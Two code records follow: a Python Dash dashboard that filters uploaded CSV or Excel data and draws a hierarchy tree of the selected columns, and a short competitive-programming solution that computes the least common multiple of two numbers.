+{"seq_id":"19520043306","text":"\nfrom imp import reload\nimport dash_bootstrap_components as dbc\nfrom dash import html\nfrom dash import dcc\n\nfrom dash.dependencies import Input, Output, State\nimport re\nimport dash\nimport pandas as pd\nfrom dash.exceptions import PreventUpdate\nimport numpy as np\nimport graphviz\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport string\nimport base64\nfrom dash import dash_table\nimport io\nimport time\n\nfrom sqlalchemy import column\nfrom anytree import Node,AnyNode\nfrom anytree.exporter import UniqueDotExporter\nfrom anytree.exporter import DotExporter\nimport pydot\n\n(graph,) = pydot.graph_from_dot_file('somefile.dot')\ngraph.write_png('somefile.png')\n# import cx_Oracle\n# from sqlalchemy import types, create_engine\n\napp = dash.Dash(suppress_callback_exceptions=True,external_stylesheets=[dbc.themes.CERULEAN])\n\nSIDEBAR_HIDEN = {\n    \"position\": \"fixed\",\n    \"top\": 62.5,\n    \"left\": 0,\n    \"bottom\": 0,\n    \"width\": \"18rem\",\n    \"padding\": \"2rem 1rem\",\n    \"background-color\": \"#e8e9eb\",\n    \"overflowY\": \"scroll\",\n    \"height\": \"89%\",\n    \"overflow-x\": \"hidden\",\n    \"transition\": \"all 0.5s\"\n    \n}\n\n# SIDEBAR_STYLE = {\n#     \"position\": \"fixed\",\n#     \"top\": 62.5,\n#     \"left\": \"-18rem\",\n#     \"bottom\": 0,\n#     \"width\": \"18rem\",\n#     \"height\": \"89%\",\n#     \"z-index\": 1,\n#     \"overflow-x\": \"hidden\",\n#     \"transition\": \"all 0.5s\",\n#     \"padding\": \"0rem 0rem\",\n#     \"background-color\": \"#f8f9fa\",\n# }\nSIDEBAR_STYLE = {\n    \"position\": \"fixed\",\n    \"top\": 0,\n    \"left\": 0,\n    \"bottom\": 0,\n    \"width\": \"17rem\",\n    \"padding\": \"4rem 1rem\",\n    \"background-color\": \"#d7d8db\",\n    \"overflowY\": \"scroll\",\n}\n# the styles for the main content position it to the right of the sidebar and\n# add some padding.\nCONTENT_STYLE1 = {\n    \"margin-top\":\"3rem\",\n    \"margin-left\": \"11rem\",\n    \"margin-right\": \"1rem\",\n    \"padding\": \"2rem 1rem\",\n}\n\nCONTENT_STYLE = {\n    \"margin-left\": \"18rem\",\n    \"margin-right\": \"2rem\",\n    \"padding\": \"2rem 2rem\",\n}\n\n\nBUTTON_HIDEN = {\n    \"margin-top\":\"3rem\",\n    \"margin-left\":\"11rem\"\n    }\n\nBUTTON_STYLE = {\n    \"margin-top\":\"3rem\",\n    }\nconfig = {'modeBarButtonsToRemove': ['toggleSpikelines','hoverCompareCartesian','zoom2d','zoomIn2d',\n                                    'zoomOut2d','resetScale2d','autoScale2d','select2d','pan2d','lasso2d'],\n        'displaylogo': False\n}\nsidebar = html.Div(\n    [\n        html.H4(\"Data Analysis\", 
className=\"display-15\"),\n html.Hr(),\n dbc.Nav(\n [ \n dcc.Upload([\n 'Drag and Drop or ',\n html.A('Select a File')\n ], style={\n 'width': '100%',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center'\n },id='upload'),html.Br(),\n dbc.Collapse(\n dbc.Card(dbc.CardBody([\n dbc.Collapse(dcc.Dropdown(\n value=[], \n id=\"radioitems\"\n ),id='sheet_values',is_open=False),\n html.Br(), \n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4('Select Columns'),\n dbc.Checklist(\n id=\"columns\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"150px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"),\n id='columns_collapse',is_open=False\n ), \n html.Br(), \n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4('Select Filters'),\n dbc.Checklist(\n id=\"Filters\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"150px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"),\n id='Filters_collapse',is_open=False\n )]),outline=True, color=\"dark\"),id='card_collapse',is_open=False), \n \n html.Br(),\n \n html.Button(\n \"Apply Filters\",\n id=\"y_collapse-button\",\n className=\"mr-1\",\n # color=\"primary\",\n n_clicks=0,\n style={'background-color': '#38ACEC',\n 'border': 'none',\n 'color': 'white',\n 'padding': '10px 32px',\n 'text-align': 'center',\n 'text-decoration': 'none',\n 'display': 'inline-block',\n 'font-size': '16px',\n 'border-radius': '4px'}\n ),\n html.Br(),\n dbc.Collapse(\n dbc.Card(dbc.CardBody([\n html.Div(dbc.Card(dbc.CardBody([\n html.H4(id=\"columnName\"),\n dbc.Checklist(\n id=\"column\",\n value=[],inline=True\n )]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"),\n html.Br(), \n dbc.Collapse(\n # html.Br(),\n html.Div(dbc.Card(dbc.CardBody([\n html.H4(id=\"columnName1\"),\n dbc.Checklist(\n id=\"column1\",\n # options=[{\"label\": o, \"value\": o} for o in df['Year'].unique()],\n value=[]\n )]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"), \n id=\"column1_collapse\",\n is_open=False) ,html.Br(),\n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4(id=\"columnName2\"),\n dbc.Checklist(\n id=\"column2\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\"},\n className=\"no-scrollbars\"),\n id='column2_collapse',is_open=False,\n ),html.Br(),\n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4(id=\"columnName3\"),\n dbc.Checklist(\n id=\"column3\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\"overflow-x\": \"hidden\",\n \".inner-border\":\"-webkit-scrollbar\"},className=\"no-scrollbars\"\n ),\n id='column3_collapse',is_open=False,\n ),html.Br(),\n dbc.Collapse(html.Div(\n dbc.Card(dbc.CardBody([ html.H4(id=\"columnName4\"),\n dbc.Checklist(\n id=\"column4\",\n value=[])]),style={\"width\": \"13rem\"}),style={\"maxHeight\": \"200px\", \"overflow\": \"scroll\",\n \"overflow-x\": \"hidden\",\"background\": \"transparent\"},className=\"no-scrollbars\"),\n id='column4_collapse',is_open=False,\n )]),\n outline=True, color=\"dark\"), \n id=\"contract_collapse\",\n is_open=False), \n html.Br(), \n html.Br(), \n 
html.Button(id=\"submit-button\", className=\"mr-1\", n_clicks=0,\n style={'background-color': '#38ACEC',\n 'border': 'none',\n 'color': 'white',\n 'padding': '10px 32px',\n 'text-align': 'center',\n 'text-decoration': 'none',\n 'display': 'inline-block',\n 'font-size': '16px',\n 'border-radius': '4px'}), \n ], vertical=True,\n pills=True)\n ],\n id='sidebar',\n style=SIDEBAR_STYLE,className=\"no-scrollbars\"\n)\n\n\n\ncontent = html.Div(id=\"page-content1\", style=CONTENT_STYLE,)\napp.layout = html.Div([dcc.Location(id='page-2-display-value'),\n sidebar, content, html.Br(),dcc.Loading(id=\"loading-1\",type=\"default\",\n children=html.Div(id=\"loading-output-1\"),className='_dash-loading-callback'),\n dcc.Store(id='side_click'),dcc.ConfirmDialog(id='confirm-danger',\n message='Graph size too large if you want to download it click ok'),dcc.Store(id='image-size'),\n dcc.Download(id=\"download-image\")])\n\ndef parse_data(contents, filename,opt,value):\n global df\n if opt is None:\n opt=0\n if contents:\n content_type, content_string = contents.split(\",\")\n # print(len(opt))\n decoded = base64.b64decode(content_string)\n if (len(opt)>1) and (len(value)>0) :\n # print(value)\n xl = pd.ExcelFile(io.BytesIO(decoded))\n df=pd.read_excel(xl,sheet_name=value)\n return df\n elif (len(opt)==1) or (len(opt)==0):\n if \"csv\" in filename:\n # Assume that the user uploaded a CSV or TXT file\n df = pd.read_csv(io.StringIO(decoded.decode(\"utf-8\")))\n elif (\"xls\" in filename) or ('xlsx' in filename):\n print(filename)\n # Assume that the user uploaded an excel file\n df = pd.read_excel(io.BytesIO(decoded))\n elif (\"txt\" in filename) or (\"tsv\" in filename):\n # Assume that the user upl, delimiter = r'\\s+'oaded an excel file\n df = pd.read_csv(io.StringIO(decoded.decode(\"utf-8\")), delimiter=r\"\\s+\")\n # except Exception as e:\n # print(e)\n # return html.Div([\"There was an error processing this file.\"])\n\n # return df \n # def data_disply(contents, filename):\n # if contents:\n # contents = contents[0]\n # filename = filename[0]\n # df = parse_data(contents, filename)\n # return df\n return df\n\n@app.callback(Output(\"y_collapse-button\",\"hidden\"),\n [Input(\"columns\",\"value\"),\n Input(\"Filters\",\"value\")]) \ndef applyFilters_collapse(value1,value2):\n if (len(value1)>0) and (len(value2)>0):\n return False\n return True\n@app.callback(Output(\"side_click\",\"data\"),\n [Input(\"upload\", \"contents\"), Input(\"upload\", \"filename\"),\n Input('radioitems','options'),\n Input('radioitems','value')])\ndef data(contents, filename,opt,value):\n if opt is None:\n opt=[]\n if len(opt)>1:\n if (contents) and (len(value)>0):\n df1=parse_data(contents, filename,opt,value)\n return df1.to_dict('records')\n elif (len(opt)==1) or (len(opt)==0):\n if contents:\n df1=parse_data(contents, filename,opt,value)\n print(df1)\n return df1.to_dict('records')\n\n@app.callback(\n Output(\"contract_collapse\", \"is_open\"),\n [Input(\"y_collapse-button\", \"n_clicks\")],\n [State(\"contract_collapse\", \"is_open\")],\n)\ndef y_toggle_collapse(n, is_open):\n if n :\n return not is_open\n return is_open\n\n@app.callback(Output('column','options'),\n Output(\"columnName\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef first_filter(data,values):\n # try:\n if (data) and (len(values)>0):\n data=pd.DataFrame(data)\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n data=data[data[values[0]].isnull()==False]\n\n return [{\"label\":x,\"value\":x} 
for x in data[values[0]].unique()],values[0]\n else:\n return [],'' \n # except:\n # print(\"exit\")\n # return [],''\n\n@app.callback(Output('column1_collapse','is_open'),\n [Input('column','value'),Input('column1','options')],\n # [State(\"check_collapse\", \"is_open\")]\n)\ndef collapse1(value,opt):\n # print(len(value))\n if (len(value)>0) and (len(opt)>0):\n return True\n return False\n\n@app.callback(Output('column1','options'),\n Output(\"columnName1\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef second_filter(data,values):\n # try:\n if (data) and (len(values)>1):\n data=pd.DataFrame(data)\n data=data[data[values[1]].isnull()==False]\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n return [{\"label\":x,\"value\":x} for x in data[values[1]].unique()],values[1]\n else:\n return [],'' \n\n@app.callback(Output('column2_collapse','is_open'),\n [Input('column1','value'),Input('column2','options')],\n # [State(\"check_collapse\", \"is_open\")]\n)\ndef collapse2(value,opt):\n # print(len(value))\n if (len(value)>0) and (len(opt)>0):\n return True\n return False\n\n@app.callback(Output('column2','options'),\n Output(\"columnName2\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef third_filter(data,values):\n # try:\n if (data) and (len(values)>2):\n data=pd.DataFrame(data)\n data=data[data[values[2]].isnull()==False]\n # print(data[values[2]].isnull().sum())\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n return [{\"label\":x,\"value\":x} for x in data[values[2]].unique()],values[2]\n else:\n return [],'' \n\n@app.callback(Output('column3_collapse','is_open'),\n [Input('column2','value'),Input(\"column3\",\"options\")],\n # [State(\"check_collapse\", \"is_open\")]\n)\ndef collapse3(value,opt):\n # print(len(value))\n if (len(value)>0) and (len(opt)>0):\n return True\n return False\n\n@app.callback(Output('column3','options'),\n Output(\"columnName3\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef four_filter(data,values):\n # try:\n if (data) and (len(values)>3):\n data=pd.DataFrame(data)\n data=data[data[values[3]].isnull()==False]\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n return [{\"label\":x,\"value\":x} for x in data[values[3]].unique()],values[3]\n else:\n return [],'' \n\n@app.callback(Output('column4_collapse','is_open'),\n [Input('column3','value'),Input(\"column4\",\"options\")],\n # [State(\"check_collapse\", \"is_open\")]\n)\ndef collapse3(value,opt):\n # print(len(value))\n if (len(value)>0) and (len(opt)>0):\n return True\n return False\n\n@app.callback(Output('column4','options'),\n Output(\"columnName4\",\"children\"),\n [Input(\"side_click\",\"data\"),\n Input(\"Filters\",\"value\")])\ndef four_filter(data,values):\n # try:\n if (data) and (len(values)>4):\n data=pd.DataFrame(data)\n data=data[data[values[4]].isnull()==False]\n # print([{\"label\":x,\"value\":x} for x in data[values[0]].unique()])\n return [{\"label\":x,\"value\":x} for x in data[values[4]].unique()],values[4]\n else:\n return [],'' \n# @app.callback(Output('browsers','options'),\n# [Input('year','value')])\n\n# def Quarter_value(n):\n# data=df.loc[df['Year'].isin(n),['Quarters']]\n# return[{\"label\": 'Q'+str(x), \"value\": x} for x in data['Quarters'].unique()] \n\n\n\n# @app.callback(\n# Output('submit-button', 'hidden'),\n# [Input('y_collapse-button','n_clicks')]\n# )\n# def 
show_button(n_clicks):\n# if (n_clicks%2 == 0):\n# return True\n# else:\n# return False\n@app.callback(Output('card_collapse','is_open'),\n [Input(\"upload\", \"contents\"),Input(\"y_collapse-button\",\"n_clicks\")])\ndef card(content,nclick):\n # print(nclick%2)\n if (content) and (nclick%2==0):\n return True\n elif nclick%2!=0:\n return False\n\n@app.callback(Output('columns_collapse','is_open'),\n [Input(\"upload\", \"contents\"),Input('radioitems','options'),\n Input('radioitems','value')])\ndef column_collapase(contents,options,value):\n if options is None:\n options=[]\n if len(options)>1:\n if (contents) and (len(value)>0):\n return True\n return False\n elif (len(options)==1) or (len(options)==0):\n if contents:\n return True\n return False\n\n@app.callback(Output('Filters_collapse','is_open'),\n [Input('columns','value')])\ndef filter_collapse(value):\n if len(value)>0:\n return True\n return False\n\n@app.callback(Output('sheet_values','is_open'),\n [Input(\"upload\", \"contents\"),Input(\"radioitems\",'options')])\ndef options_collapse(file,options):\n if options is None:\n options=[]\n if (file) and (len(options)>1):\n return True\n return False\n\n@app.callback(Output(\"radioitems\",\"options\"),\n [Input(\"upload\", \"contents\"), Input(\"upload\", \"filename\")])\ndef options1(contents, filename):\n value=list()\n \n if (contents):\n if (\"xlsx\" in filename) or (\"xls\" in filename):\n content_type, content_string = contents.split(\",\")\n\n decoded = base64.b64decode(content_string)\n # # try:\n xl = pd.ExcelFile(io.BytesIO(decoded))\n [value.append(y)for y in xl.sheet_names]\n # print(len(value))\n if len(value)>0: \n return [{'label':x,'value':x} for x in value]\n else:\n return [] \n # except:\n # return []\n\n@app.callback(Output('columns','options'),\n [Input(\"side_click\",\"data\"),Input('radioitems','options'),\n Input('radioitems','value')])\ndef column_names(data,opt,value):\n # print(opt)\n # print(data)\n if opt is None:\n opt=[]\n columns=list()\n if len(opt)>1:\n if (data) and (len(value)>0):\n df=pd.DataFrame(data)\n # print(df)\n [columns.append(x) for x in df.columns]\n # print([{'label':x,'value':x} for x in columns]) \n elif (len(opt)==1) or (len(opt)==0):\n if (data):\n df=pd.DataFrame(data)\n # print(df)\n [columns.append(x) for x in df.columns]\n # print([{'label':x,'value':x} for x in columns]) \n return [{'label':x,'value':x} for x in columns]\n\n@app.callback(Output('Filters','options'),\n [Input(\"side_click\",\"data\"),Input('radioitems','options'),\n Input('radioitems','value'),Input(\"Filters\",\"value\")])\ndef column_names(data,opt,value,value1):\n columns=list()\n # print(opt)\n if opt is None:\n opt=[]\n if (len(opt)>1):\n if (data) and (len(value)>0):\n df=pd.DataFrame(data)\n # print(df)\n [columns.append(x) for x in df.columns]\n # print([{'label':x,'value':x} for x in columns]) \n elif (len(opt)==1) or (len(opt)==0) or (opt is None):\n if (data):\n df=pd.DataFrame(data)\n # print(df)\n [columns.append(x) for x in df.columns]\n # print([{'label':x,'value':x} for x in columns])\n if len(value1)==5:\n options=list()\n for i in df.columns:\n if i in value1:\n options.append({'label':i,'value':i})\n else:\n options.append({'label':i,'value':i,\"disabled\": True})\n return options\n else: \n return [{'label':x,'value':x} for x in columns]\n\n@app.callback(Output('column_collapse','is_open'),\n [Input('upload','contents')])\ndef column_collapse(content):\n if content:\n return True\n return False 
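# --- Editor's note: hypothetical alternative, not the author's code. The loc_fun/len_fun
# tables below assemble pandas filter expressions as strings and run them through eval();
# the same cascading filter can be built by AND-ing boolean masks, which avoids eval's
# injection and typo risks. `apply_filters` is a name invented here for illustration. ---
import numpy as np
import pandas as pd

def apply_filters(df1: pd.DataFrame, filters: list, selections: list) -> pd.DataFrame:
    # selections[i] holds the allowed values for column filters[i]
    mask = np.ones(len(df1), dtype=bool)
    for col, allowed in zip(filters, selections):
        if allowed:  # skip filters the user left empty
            mask &= df1[col].isin(allowed).to_numpy()
    return df1.loc[mask, :]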
\n\n@app.callback(Output('submit-button','children'),\n            [Input(\"submit-button\",\"n_clicks\")])\ndef button_name(n_clicks):\n    if n_clicks%2==0:\n        return [\"Generate Graph\"]\n    elif n_clicks%2!=0:\n        return [\"Back To Grid\"]\n\n@app.callback(Output('confirm-danger','displayed'),\n            [Input('image-size','data')])\ndef display_confirm(value):\n    # the image-size store is None until a graph has been generated\n    if value and int(value)>1000:\n        return True\n    return False\n@app.callback(Output('download-image','data'),\n            [Input('confirm-danger','submit_n_clicks')]) \ndef download_image(n_clicks):\n    if n_clicks is None:\n        n_clicks=0\n    if (int(n_clicks)>0):\n        return dcc.send_file(\"assets\\\\root.png\") \n\nloc_fun={\n    1:'df1.loc[df1[filters[0]].isin(value),:]',\n    2:'df1.loc[(df1[filters[0]].isin(value))&(df1[filters[1]].isin(value1)),:]',\n    3:\"df1.loc[(df1[filters[0]].isin(value))&(df1[filters[1]].isin(value1))&(df1[filters[2]].isin(value2)),:]\",\n    4:\"\"\"df1.loc[(df1[filters[0]].isin(value))&(df1[filters[1]].isin(value1))&(df1[filters[2]].isin(value2))&\n        (df1[filters[3]].isin(value3)),:]\"\"\",\n    5:\"\"\"df1.loc[(df1[filters[0]].isin(value))&(df1[filters[1]].isin(value1))&(df1[filters[2]].isin(value2))&\n        (df1[filters[3]].isin(value3))&(df1[filters[4]].isin(value4)),:]\"\"\"}\n\n\nlen_fun={\n    1:\"[len(value)]\",\n    2:\"[len(value),len(value1)]\",\n    3:\"[len(value),len(value1),len(value2)]\",\n    4:\"[len(value),len(value1),len(value2),len(value3)]\",\n    5:\"[len(value),len(value1),len(value2),len(value3),len(value4)]\"}\n\ngraph_sorted={2:\"{columns[0]:len(final_data[columns[0]].unique()),columns[1]:len(final_data[columns[1]].unique())}\",\n    3:\"\"\"{columns[0]:len(final_data[columns[0]].unique()),columns[1]:len(final_data[columns[1]].unique()),\n        columns[2]:len(final_data[columns[2]].unique())}\"\"\",\n    4:\"\"\"{columns[0]:len(final_data[columns[0]].unique()),columns[1]:len(final_data[columns[1]].unique()),\n        columns[2]:len(final_data[columns[2]].unique()),columns[3]:len(final_data[columns[3]].unique())}\"\"\"}\n\n\n@app.callback(Output(\"submit-button\",\"hidden\"),\n            [Input(\"Filters\",\"value\"),Input(\"column\",\"value\"),\n            Input('column1',\"value\"),Input('column2',\"value\"),\n            Input(\"column3\",\"value\"),Input(\"column4\",\"value\")])\ndef generateGraph(filters,value,value1,value2,value3,value4):\n    if len(filters)>0:\n        valueslen=eval(len_fun[len(filters)])\n        print(valueslen)\n        if all(valueslen)>0:\n            return False\n        return True\n    else:\n        return True\n\n\n@app.callback([Output(\"page-content1\",\"children\"),\n            Output(\"loading-output-1\", \"style\"),Output('image-size','data')], \n            [Input('columns','value'),Input(\"side_click\",\"data\"),Input(\"Filters\",\"value\"),\n            Input(\"column\",\"value\"),Input('column1',\"value\"),Input('column2',\"value\"),\n            Input(\"column3\",\"value\"),Input(\"column4\",\"value\"),Input(\"submit-button\",\"n_clicks\")])\ndef output_data(columns,data,filters,value,value1,value2,value3,value4,n_clicks):\n    if len(filters)>0:\n        lenValues=eval(len_fun[len(filters)])\n        if (data) and (all(lenValues)>0) and (n_clicks%2 == 0):\n            df1=pd.DataFrame(data)\n            filter_data=eval(loc_fun[len(filters)])\n            final_data=filter_data.loc[:,columns]\n            time.sleep(1)\n            return dash_table.DataTable(final_data.to_dict('records'), [{\"name\": i, \"id\": i} for i in final_data.columns],\n                    style_data={\n                        'whiteSpace': 'normal',\n                        'height': 'auto',\n                        'lineHeight': '15px',\n                        'color': 'black',\n                        'backgroundColor': 'white',\n                        
'border': '1px solid black'\n },style_cell_conditional=[ \n {\"if\": {\"column_id\": c}, \"textAlign\": \"center\"} for c in final_data.columns\n ],\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(220, 220, 220)',\n }],\n style_header={\n 'backgroundColor': 'rgb(210, 210, 210)',\n 'color': 'black',\n 'fontWeight': 'bold',\n 'border': '1px solid black',\n \"textAlign\": \"center\"\n },style_table={\"width\":\"950px\"},\n ),{\"align\":\"center\"},'0'\n elif (all(lenValues)>0) and (n_clicks%2 != 0):\n df1=pd.DataFrame(data)\n filter_data=eval(loc_fun[len(filters)])\n final_data=filter_data.loc[:,columns]\n # print(final_data)\n listAlphabets=list(string.ascii_uppercase)+list(string.ascii_lowercase)\n if (len(columns)>1):\n keyValue=len(columns)\n if len(columns)>4:\n keyValue=4\n columns=eval(graph_sorted[keyValue])\n columns={k:j for k,j in sorted(columns.items(),key=lambda item:item[1])}\n columns=list(columns.keys())\n else:\n columns=columns \n root = AnyNode(id=\"Hierarchy\")\n rootnode=dict()\n # print(rootnode)\n try:\n for i,j in enumerate(final_data[columns[0]].unique()):\n name=re.sub(r'[\\s\\W]','',str(j))\n rootnode[f\"s{i}\"]=j\n globals()[f\"s{i}\"] = AnyNode(id=j)\n # print(rootnode)\n except:\n []\n try: \n subnode={}\n for key,value in rootnode.items():\n subNode_Data=final_data.loc[final_data[columns[0]]==value,[columns[1]]]\n for i,j in enumerate(subNode_Data[columns[1]].unique()):\n name=re.sub(r'[\\s\\W]','',str(j))\n subnode[f\"s{name}{listAlphabets[i]}\"]=j\n globals()[f\"s{name}{listAlphabets[i]}\"] = AnyNode(id=j, parent=eval(key))\n listAlphabets.remove(listAlphabets[i])\n except:\n []\n try:\n\n # print(subnode) \n subnode1={} \n subnode_test=subnode.copy() \n for key,value in rootnode.items():\n subNode_Data=final_data.loc[final_data[columns[0]]==value,:]\n value_check=[]\n for key1,value1 in list(subnode_test.items()):\n if value1 not in value_check:\n subNode_Data1=subNode_Data.loc[subNode_Data[columns[1]]==value1,:]\n value_check.append(value1)\n # print(value_check)\n # print(subNode_Data1)\n \n for i,j in enumerate(subNode_Data1[columns[2]].unique()):\n # print(key1)\n name=re.sub(r'[\\s\\W]','',str(j))\n subnode1[f\"s{name}{listAlphabets[i]}\"]=j\n globals()[f\"s{name}{listAlphabets[i]}\"] = AnyNode(id=j, parent=eval(key1))\n listAlphabets.remove(listAlphabets[i])\n try:\n if len(subnode_test)>1:\n subnode_test.pop(key1)\n except:\n pass \n else:\n pass\n except:\n [] \n\n\n\n # print(subnode) \n # print(subnode1) \n try: \n subnode2={} \n subnode_test=subnode.copy()\n subnode1_test=subnode1.copy() \n for key,value in rootnode.items():\n subNode_Data=final_data.loc[final_data[columns[0]]==value,:]\n # print(subnode1_test)\n value_check=[]\n for key1,value1 in list(subnode_test.items()):\n if value1 not in value_check:\n subNode_Data1=subNode_Data.loc[subNode_Data[columns[1]]==value1,:]\n value_check.append(value1)\n # print(value_check)\n # print(subNode_Data1)\n value_check1=[]\n # key_check=[]\n for key2,value2 in list(subnode1_test.items()):\n if value2 not in value_check1:\n subNode_Data2=subNode_Data1.loc[subNode_Data1[columns[2]]==value2,:]\n value_check1.append(value2)\n # key_check.append(key2)\n print(subNode_Data2)\n for i,j in enumerate(subNode_Data2[columns[3]].unique()):\n # print(key2)\n name=re.sub(r'[\\s\\W]','',str(j))\n subnode2[f\"s{name}{listAlphabets[i]}\"]=j\n globals()[f\"s{name}{listAlphabets[i]}\"] = AnyNode(id=j, parent=eval(key2))\n listAlphabets.remove(listAlphabets[i])\n\n try:\n if 
len(subnode_test)>1:\n subnode_test.pop(key1) \n if len(subnode1_test)>1:\n subnode1_test.pop(key2)\n except:\n pass \n else:\n pass \n\n else:\n pass \n except:\n []\n \n \n # print(subnode1)\n # try: \n # subnode2={}\n # subnode_test=subnode.copy()\n # subnode1_test=subnode1.copy() \n\n # for key,value in rootnode.items():\n # subNode_Data=final_data.loc[final_data[columns[0]]==value,:]\n # value_check=[]\n # value_check1=[]\n # # print(subnode_test)\n # # print(subnode1_test) \n # for key1,value1 in list(subnode_test.items()):\n # if value1 not in value_check:\n # subNode_Data1=subNode_Data.loc[subNode_Data[columns[1]]==value1,:]\n # value_check.append(value1)\n # # print(value_check)\n\n \n \n # # print(value_check1)\n # for key2,value2 in list(subnode1_test.items()):\n # if value2 not in value_check1:\n # print(value2)\n # subNode_Data2=subNode_Data1.loc[subNode_Data1[columns[2]]==value2,:]\n # value_check1.append(value2)\n # # print(len(subnode1_test))\n # # print(subNode_Data2)\n\n \n # # print(subNode_Data2)\n # for i,j in enumerate(subNode_Data2[columns[3]].unique()):\n # # print(subnode1_test)\n # print(key2)\n # name=re.sub(r'[\\s\\W]','',str(j))\n # subnode2[f\"s{name}{listAlphabets[i]}\"]=j\n # globals()[f\"s{name}{listAlphabets[i]}\"] = AnyNode(id=j, parent=eval(key2))\n # listAlphabets.remove(listAlphabets[i])\n # # print(subnode1_test)\n # # if (len(subnode_test)>1): \n # # subnode_test.pop(key1)\n # # if (len(subnode1_test)>1):\n # # subnode1_test.pop(key2)\n # # print(subnode_test)\n\n # else:\n # pass\n # else:\n # pass \n # except:\n # [] \n # print(subnode2)\n # subnode3={}\n # subnode_test=subnode.copy()\n # subnode1_test=subnode1.copy()\n # subnode2_test=subnode2.copy()\n # for key,value in rootnode.items(): \n # subNode_Data=final_data.loc[final_data[columns[0]]==value,:]\n # value_check=[]\n # for key1,value1 in list(subnode_test.items()):\n # if value1 not in value_check:\n # subNode_Data1=subNode_Data.loc[subNode_Data[columns[1]]==value1,:]\n # value_check.append(value1)\n\n # value_check1=[]\n # for key2,value2 in list(subnode1_test.items()):\n # if value2 not in value_check1:\n # subNode_Data2=subNode_Data1.loc[subNode_Data1[columns[2]]==value2,:]\n # value_check1.append(value2)\n # if (len(subnode1_test)>1) and (len(subnode1_test)>1):\n # subnode1_test.pop(key2)\n # subnode_test.pop(key1) \n # value_check2=[]\n # for key3,value3 in list(subnode2_test.items()):\n # if value3 not in value_check2:\n # subNode_Data3=subNode_Data2.loc[subNode_Data2[columns[3]]==value3,:] \n # value_check2.append(value3)\n # if len(subnode2_test)>1:\n # subnode2_test.pop(key3)\n # print(subnode2_test) \n # # print(subNode_Data3) \n # for i,j in enumerate(subNode_Data3[columns[4]].unique()):\n # # print(j)\n # name=re.sub(r'[\\s\\W]','',str(j))\n # subnode3[f\"{listAlphabets[i]}s{name}\"]=j\n # print(key3)\n # globals()[f\"{listAlphabets[i]}s{name}\"] = AnyNode(id=j, parent=eval(key3))\n\n # # if len(subnode2_test)>1:\n # # subnode2_test.pop(key3) \n \n # else:\n # pass\n # else:\n # pass \n # else:\n # pass \n # print(subnode3)\n UniqueDotExporter(s0,\n nodeattrfunc=lambda n: 'shape=box,label=\"%s\"' % (n.id)).to_picture('root.jpg') \n image_filename = r'C:\\Users\\Gopi\\OneDrive - PiLog India Private Limited\\Desktop\\spendHierarchy\\root.jpg' # replace with your own image\n img=Image.open(image_filename)\n width,height = img.size\n print(width,height)\n encoded_image = base64.b64encode(open(image_filename, 'rb').read())\n \n return 
(dbc.Card(dbc.CardBody(html.Img(src='data:image/png;base64,{}'.format(encoded_image.decode()))),\n            style={\"width\":f\"{width+25}px\"}),{\"align\":\"center\"},width)\n        else:\n            return dbc.Card([\n                dbc.CardBody([\n                    html.H3(\"Welcome to DashBoard\", className=\"card-title\"),\n                    html.P(\"Select required values in the Sidebar to Generate Graphs.\",className='card-text')\n                ])\n            ],color='secondary',inverse=True),{\"align\":\"center\"},'0'\n        \n    else:\n        return dbc.Card([\n            dbc.CardBody([\n                html.H3(\"Welcome to DashBoard\", className=\"card-title\"),\n                html.P(\"Select required values in the Sidebar to Generate Graphs.\",className='card-text')\n            ])\n        ],color='secondary',inverse=True),{\"align\":\"center\"},'0'\n        \nif __name__ == \"__main__\":\n    app.run_server(port=8000)\n","repo_name":"gopikrishna225/SpendHierarchy","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":36357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"28898873657","text":"import math\nimport sys\ninput = sys.stdin.readline\n\n\ndef lcm(x, y):\n    # math.gcd replaces fractions.gcd, which was removed in Python 3.9\n    return (x * y) // math.gcd(x, y)\n\n\ndef main():\n    A, B = map(int, input().split())\n\n    print(lcm(A, B))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"suuungwoo/AtCoder","sub_path":"abc/148/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
